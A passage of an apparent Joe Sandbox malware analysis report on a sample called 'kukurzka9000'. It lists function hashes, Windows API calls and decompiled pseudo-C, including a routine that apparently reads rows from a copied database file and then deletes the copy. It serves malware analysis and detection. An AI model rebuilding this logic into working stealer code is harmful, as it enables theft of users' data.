Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,afb5c633c4650f69312baef49db9dfa4,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

wsprintfW.USER32 ref: 004093E3

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 004093FB
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 00409402
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 00409411
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 0040941B

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$lstrcpyn$lstrlen$AllocByteCharGlobalInfoMultiSystemWidewsprintf
String ID:
API String ID: 850942500-0
Opcode ID: b4d1448f4ce841ff52ca8b65c126921d7f37aa71f907b12cfa87153c2d27789a
Instruction ID: bf3e6bb46204bb3e37d09e038ca25be6bf8868f14e997d98ff16e67e74bb5e03
Opcode Fuzzy Hash: b4d1448f4ce841ff52ca8b65c126921d7f37aa71f907b12cfa87153c2d27789a
Instruction Fuzzy Hash: 0D4192B1A002149FDB04CF69DDC496ABBF8EB48320B14857AFE09FB355D6749D50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 022B8E7A Relevance: 12.8, APIs: 10, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d851c9bc5cda07b011c471ba514d21b876054248c69a850a91c851fea1f9c6b3
Instruction ID: 92c05a8cf9436c5baaf6183c4c48fd8dae2702b0b13821bf97aa7e87910c5e77
Opcode Fuzzy Hash: d851c9bc5cda07b011c471ba514d21b876054248c69a850a91c851fea1f9c6b3
Instruction Fuzzy Hash: E381AF72910209AFDB019BE5DD44EEE7BBEEF84350F004925FA14E72A0DB74AA10CB65

Uniqueness

Uniqueness Score: -1.00%

Function 022B71D6 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(00000000), ref: 022B73AD
InternetCloseHandle.WININET(?), ref: 022B73B9
InternetCloseHandle.WININET(00000000), ref: 022B73C0
LocalFree.KERNEL32(0000002F), ref: 022B742E
LocalFree.KERNEL32(?), ref: 022B7437
LocalFree.KERNEL32(00000000), ref: 022B743E

Strings

/, xrefs: 022B7249

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CloseFreeHandleInternetLocal
String ID: /
API String ID: 3319388337-2043925204
Opcode ID: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
Instruction ID: 9f80aa1e7be55bc2154c1ed4fe4569dcf9436af4b596b04bcacee4e1358813a1
Opcode Fuzzy Hash: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
Instruction Fuzzy Hash: 6F71E572A10215BFEB159BA5CD41FBEBBB8EF84700F048429FA15FB290D7B0AD508764

Uniqueness

Uniqueness Score: -1.00%

Function 00408495 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134stringnetworkCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 00408523
InternetOpenUrlW.WININET(0000002F,?,00408819,00000000), ref: 00408574
LocalFree.KERNEL32(00000000), ref: 004085F9
CloseHandle.KERNEL32(00000000), ref: 00408607
LocalFree.KERNEL32(00000000), ref: 0040860E

Strings

qwrqrwrqwrqwr, xrefs: 00408534
y@, xrefs: 00408495

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseHandleInternetOpenlstrlen
String ID: qwrqrwrqwrqwr$y@
API String ID: 1588835542-4056631227
Opcode ID: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction ID: 1aaf66e6ff826a0af1a1f58395baf02585259993efb391a5facff1777f096ed2
Opcode Fuzzy Hash: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction Fuzzy Hash: 4241BE70900115BEEB149BA5CE49EBAB3B8EB44300F00853AE551B72D1EBB4AE54DB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B11FB Relevance: 12.2, APIs: 8, Instructions: 151COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,00000000,00000000,?,00000000,00000000), ref: 022B123C
PathCombineW.SHLWAPI(?,00000000,0040C79C,?,00000000,00000000), ref: 022B1260
LocalFree.KERNEL32(?,?,00000000,00000000), ref: 022B130F
LocalFree.KERNEL32(?,?,00000000,00000000), ref: 022B1359
CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 022B1365
LocalFree.KERNEL32(?,?,00000000,00000000), ref: 022B136F
LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 022B1376
LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 022B137F

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CombinePath$CloseHandle
String ID:
API String ID: 2998194811-0
Opcode ID: 7829dc6c71f128cacdf391500ca352a992bf4a38fd881ec11def570a6cd4989f
Instruction ID: ba97fd0fb15299bdc3ce6a43d1c5c0dfbbc7a9c94649b986fd8d42d6b603fa32
Opcode Fuzzy Hash: 7829dc6c71f128cacdf391500ca352a992bf4a38fd881ec11def570a6cd4989f
Instruction Fuzzy Hash: 6C5130B5A00215EFEB05DFA5DE85AAE7BB9EF48340F104428FA14F7250D774AD20CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00405FEB Relevance: 11.5, APIs: 9, Instructions: 274memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(008260C0,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?), ref: 0040615C
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406221

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 0040622B
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406270
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062C7
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062CE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406325
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 0040632F

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$lstrlen$AllocGlobal
String ID:
API String ID: 3339188435-0
Opcode ID: 319254aba6765eaa7791b5b77958f6401530b4e901e8356fdf1d01df47330636
Instruction ID: ff6bad65333e8fe1a3c55b3bcf1dec483b74064a970dacde523e554a8e1a11d4
Opcode Fuzzy Hash: 319254aba6765eaa7791b5b77958f6401530b4e901e8356fdf1d01df47330636
Instruction Fuzzy Hash: 78A1A872504301ABDB14DF65DD8096BBBF5FF88300F01492DFA59A72A0D775E820CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00407213 Relevance: 10.6, APIs: 7, Instructions: 145
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00407213(intOrPtr* __ecx, intOrPtr _a4, void* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t24;
				void* _t25;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr* _t39;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t59;
				intOrPtr* _t69;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				void* _t87;
				void* _t89;
				void* _t90;
				void* _t91;

				_t59 = __ecx;
				if(_a8 == 0) {
					L18:
					return 0;
				}
				_t24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t25 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_a8 = _t25;
				_t87 =  *((intOrPtr*)( *0x40e000))(_t24, _a4,  *0x40e284);
				_t27 = E0040A69E( *0x40e000,  &_a8);
				_t89 = _a8;
				if(_t27 == 0) {
					L16:
					LocalFree(_t87);
					L17:
					DeleteFileW(_t89);
					LocalFree(_t89);
					goto L18;
				}
				_push(0);
				_push(_t89);
				_push(_t87);
				if( *((intOrPtr*)( *0x40e184))() == 0) {
					goto L16;
				}
				_t32 =  *0x40e488; // 0x0
				_push( &_v8);
				_push(_t89);
				if( *_t32() != 0) {
					L11:
					DeleteFileW(_t89);
					if(_t89 != 0) {
						LocalFree(_t89);
					}
					if(_t87 != 0) {
						LocalFree(_t87);
					}
					return 1;
				}
				_t39 =  *0x40e494; // 0x0
				_t40 =  *_t39(_v8,  *0x40e238, 0xffffffff,  &_a8, 0);
				_t91 = _t90 + 0x14;
				if(_t40 == 0) {
					while(1) {
						_push(_a8);
						_t41 =  *0x40e48c; // 0x0
						if( *_t41() != 0x64) {
							break;
						}
						_t43 =  *0x40e4b4; // 0x0
						_t44 =  *_t43(_a8, 0);
						_t69 =  *0x40e4b4; // 0x0
						_v12 = _t44;
						_t45 =  *_t69(_a8, 1);
						_t91 = _t91 + 0x10;
						_v16 = _t45;
						_push(_v12);
						if( *((intOrPtr*)( *0x40e08c))() > 1) {
							_t47 = E0040A503( *_t59, _v12);
							_t82 =  *0x40e228; // 0x825d60
							 *_t59 = _t47;
							_t48 = E0040A503(_t47, _t82);
							_push(_v16);
							 *_t59 = _t48;
							if( *((intOrPtr*)( *0x40e08c))() > 1) {
								_t51 = E0040A503( *_t59, _v16);
								_t84 =  *0x40e228; // 0x825d60
								 *_t59 = _t51;
								_t52 = E0040A503(_t51, _t84);
								_t85 =  *0x40e228; // 0x825d60
								 *_t59 = _t52;
								 *_t59 = E0040A503(_t52, _t85);
							}
						}
					}
					 *0x40e4b0(_a8);
					 *0x40e4a4(_v8);
					goto L11;
				} else {
					LocalFree(_t87);
					 *0x40e4b0(_a8);
					 *0x40e4a4(_v8);
					goto L17;
				}
			}

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 004072BC
DeleteFileW.KERNEL32(00000000,?), ref: 0040738A
LocalFree.KERNEL32(00000000), ref: 00407395
LocalFree.KERNEL32(00000000), ref: 004073A0
LocalFree.KERNEL32(00000000), ref: 004073AC
DeleteFileW.KERNEL32(00000000), ref: 004073B3
LocalFree.KERNEL32(00000000), ref: 004073BA

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: fff7a6ba5d09c9eef6c2a5eae38c7ae9a59b5e943db98ac9773f53fe00cef482
Instruction ID: e2ceee55462ef4f82933ad8064aef6a6fdd8d3625f281d360eeb473cc6bbcb89
Opcode Fuzzy Hash: fff7a6ba5d09c9eef6c2a5eae38c7ae9a59b5e943db98ac9773f53fe00cef482
Instruction Fuzzy Hash: C5419431504110AFEB099F66EE85E6E37B5EF44320F104839FD15FB2A0DB78A921DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 022B6787 Relevance: 10.6, APIs: 7, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

LocalFree.KERNEL32(00000000), ref: 022B6830
DeleteFileW.KERNEL32(00000000), ref: 022B68FE
LocalFree.KERNEL32(00000000), ref: 022B6909
LocalFree.KERNEL32(00000000), ref: 022B6914
LocalFree.KERNEL32(00000000), ref: 022B6920
DeleteFileW.KERNEL32(00000000), ref: 022B6927
LocalFree.KERNEL32(00000000), ref: 022B692E

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: e9d8f00487e522992aaaed3d2169ef1b2b551e54072380db451c7127056c5058
Instruction ID: 06a00f8aee720a7f6ee8b6f151f59c77d0a9192694d01cf6f97af164f5ff9f57
Opcode Fuzzy Hash: e9d8f00487e522992aaaed3d2169ef1b2b551e54072380db451c7127056c5058
Instruction Fuzzy Hash: B041D231610111EFDB1A9FA2EE44EAD3BB9EF49360F104838F915E72A4DB74A910CF19

Uniqueness

Uniqueness Score: -1.00%

Function 022B7A09 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 134stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 022B7A97
LocalFree.KERNEL32(00000000), ref: 022B7B6D
CloseHandle.KERNEL32(00000000), ref: 022B7B7B
LocalFree.KERNEL32(00000000), ref: 022B7B82

Strings

/, xrefs: 022B7A6D
s, xrefs: 022B7ABA

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseHandlelstrlen
String ID: /$s
API String ID: 3009051031-4105443823
Opcode ID: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction ID: 07c25ebaf69e4a1af0e456f196a5c5e1933fa0778b2e8eac30ab0a60d2684cae
Opcode Fuzzy Hash: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction Fuzzy Hash: 8F41DC72910116BEEB159FA5CD45FBAF3B8EF84344F008528F601A71D0EBB0AA54CB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B8843 Relevance: 9.1, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,022B8FE8,00000000,00000000,00000000,00000000,00000000), ref: 022B8939

Part of subcall function 022B9A36: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,00000000,00000000), ref: 022B9A65

wsprintfW.USER32 ref: 022B8957

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,022B8FE8,00000000), ref: 022B896F
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,022B8FE8,00000000), ref: 022B8976
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,022B8FE8,00000000,00000000,00000000,00000000,00000000), ref: 022B8985
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,022B8FE8,00000000,00000000,00000000,00000000,00000000), ref: 022B898F

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$ByteCharGlobalInfoMultiSystemWidewsprintf
String ID:
API String ID: 2924325140-0
Opcode ID: a6de5e848d937083b49f0169d3b41f08eb3f60cdac5fbd5286eae1f109443dba
Instruction ID: c887e7dde7adfeb67f4462e758f72807b584a865802eb64f83078bba8367c37a
Opcode Fuzzy Hash: a6de5e848d937083b49f0169d3b41f08eb3f60cdac5fbd5286eae1f109443dba
Instruction Fuzzy Hash: F84192B1A002159FDB04CFA9DDC49AABBF8EF0C350B048579EE09E7355DA74AD44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004090DC Relevance: 9.1, APIs: 6, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000104,?,?,?,00409A62,00000000), ref: 0040913F
RegCloseKey.ADVAPI32(00000000,?,?,?,00409A62,00000000), ref: 00409148
LocalFree.KERNEL32(00000000,?,?,?,00409A62,00000000), ref: 0040915B
wsprintfW.USER32 ref: 0040916D

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,00000000), ref: 00409185
LocalFree.KERNEL32(00000000), ref: 0040918C

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$lstrlen$CloseGlobalQueryValuewsprintf
String ID:
API String ID: 3289414791-0
Opcode ID: 5e8d92e3f70d5fe38f1763d2356ae79cd52bc82e3d2d85c46ec5827371f6db32
Instruction ID: e9f177af51a582558b006cd38ce564a6bd3d86c6e4fd3138e243791f8522013c
Opcode Fuzzy Hash: 5e8d92e3f70d5fe38f1763d2356ae79cd52bc82e3d2d85c46ec5827371f6db32
Instruction Fuzzy Hash: 8E119372600110BBE7049BA7ED49E5BBFBCEB49350B104839F609F61A1D6B45D20CB79

Uniqueness

Uniqueness Score: -1.00%

Function 022B8650 Relevance: 9.1, APIs: 6, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000104,?,?,?,022B8FD6,00000000), ref: 022B86B3
RegCloseKey.ADVAPI32(00000000,?,?,?,022B8FD6,00000000), ref: 022B86BC
LocalFree.KERNEL32(00000000,?,?,?,022B8FD6,00000000), ref: 022B86CF
wsprintfW.USER32 ref: 022B86E1

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(00000000,00000000), ref: 022B86F9
LocalFree.KERNEL32(00000000), ref: 022B8700

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$CloseGlobalQueryValuewsprintf
String ID:
API String ID: 923078377-0
Opcode ID: 1195a9609c4ac859f50556a4f5fb5b67e16fe42b1b7cf2e21ecfb1ab86fba5f5
Instruction ID: 15202a3ad74347d1a5ba381a58f70f7170bac0edcfa838bee66b773bb1ccfad3
Opcode Fuzzy Hash: 1195a9609c4ac859f50556a4f5fb5b67e16fe42b1b7cf2e21ecfb1ab86fba5f5
Instruction Fuzzy Hash: 74115172210110BBE7149BA6ED49EABBBBCEF49754F104838F649E2160DBB15920CB79

Uniqueness

Uniqueness Score: -1.00%

Function 022B555F Relevance: 9.0, APIs: 7, Instructions: 274COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000), ref: 022B5795

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000), ref: 022B579F
LocalFree.KERNEL32(00000000,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 022B57E4
LocalFree.KERNEL32(?,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 022B583B
LocalFree.KERNEL32(00000000,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 022B5842
LocalFree.KERNEL32(00000000,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 022B5899
LocalFree.KERNEL32(?,?,?,?,?,022B4E4B,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 022B58A3

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$Global
String ID:
API String ID: 67877634-0
Opcode ID: 154df15a1167a433e68271407e97ec1704788d52295b520c09530d825bd9e518
Instruction ID: e29934bba6ab1e51ff8308a40e567a1ccdae3b5dbba1647e5f48af8d6a335811
Opcode Fuzzy Hash: 154df15a1167a433e68271407e97ec1704788d52295b520c09530d825bd9e518
Instruction Fuzzy Hash: E6A1CF71514301AFDB15DFA5CD809ABBBF5FF88340F404928FA55AB260D771D860CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0BE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,iqroq5112542785672901323), ref: 0040A0D6
OpenProcessToken.ADVAPI32(00000000,?,iqroq5112542785672901323), ref: 0040A0DD
GetLastError.KERNEL32(?,iqroq5112542785672901323), ref: 0040A102
GlobalFree.KERNEL32(00000000), ref: 0040A15F

Strings

iqroq5112542785672901323, xrefs: 0040A0CB

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Process$CurrentErrorFreeGlobalLastOpenToken
String ID: iqroq5112542785672901323
API String ID: 88979007-2937663778
Opcode ID: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction ID: 15eb1b3bc6c873a00f883c6e6f8e066a9c9a871e93fd9db043f72c5c5a2fc382
Opcode Fuzzy Hash: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction Fuzzy Hash: 51118135900215FBDB119BE6DE44EAFBBB8EB48750F040475E900F61A0DB74DE24DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00403F9D(void* __ecx, intOrPtr __edx, char _a4, char _a8) {
				void* _t7;
				void* _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;

				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228, _t26, _t30, _t16, __ecx);
				_t7 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228);
				_t28 = _t7;
				 *0x40e0c4(0, _t17, 0x1c, 0);
				 *0x40e0c4(0, _t28, 0x1a, 0);
				_t1 =  &_a8; // 0x407b38
				E00401B05(_t17,  *_t1, __edx, _a4, 0);
				_t3 =  &_a8; // 0x407b38
				E0040196E(_t28,  *_t3, __edx, _a4, 0);
				if(_t17 != 0) {
					LocalFree(_t17);
				}
				if(_t28 != 0) {
					LocalFree(_t28);
				}
				return 1;
			}

0x00403fbe
0x00403fc3
0x00403fcc
0x00403fce
0x00403fdb
0x00403fe1
0x00403fec
0x00403ff1
0x00403fff
0x00404009
0x0040400c
0x0040400c
0x00404014
0x00404017
0x00404017
0x00404026

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00407B38,00000000,00000000), ref: 00403FCE
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,?,00407B38,00000000,00000000), ref: 00403FDB
LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 0040400C
LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 00404017

Strings

8{@, xrefs: 00403FE1, 00403FF1

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FolderFreeLocalPathSpecial
String ID: 8{@
API String ID: 1111715986-1865321623
Opcode ID: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
Instruction ID: 72fdba0f78f482ba83b50744195af73f567e22cf42767fcd2574695d6fb78c79
Opcode Fuzzy Hash: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
Instruction Fuzzy Hash: 600128713402047BF7205F929D4AF6B3768DBC5B11F044138FB18BB2D1DAB49C1086AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABD8 Relevance: 7.7, APIs: 6, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0040ABD8(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				short _v32;
				short _v36;
				short _v38;
				char _v40;
				short _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				intOrPtr _v76;
				char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				void* _v116;
				void* _v120;
				short* _v144;
				WCHAR* _v148;
				char _v160;
				intOrPtr _v164;
				void* _t44;
				intOrPtr _t47;
				signed int _t49;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				void* _t54;
				char _t55;
				intOrPtr _t57;
				intOrPtr* _t69;
				void* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t87;
				intOrPtr _t94;
				void* _t98;
				intOrPtr _t102;
				void* _t105;
				intOrPtr _t107;
				void* _t110;
				intOrPtr* _t111;
				void* _t112;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int _t120;
				void* _t123;

				_v44 = 0;
				_v24 = __edx;
				_v20 = __ecx;
				_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000, _t105, _t112, _t77);
				_t44 = E0040AE06(0, _t78,  &_v52, __ecx, 0, 0, __edx, 0);
				_t123 = (_t120 & 0xfffffff8) - 0x2c + 0x14;
				if(_t44 >= 0) {
					_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
					_v48 = _t107;
					_t47 =  *((intOrPtr*)( *0x40e144))(0x208, _t107);
					_v64 = _t47;
					if(_t47 == 0) {
						L10:
						if(_v68 > 0) {
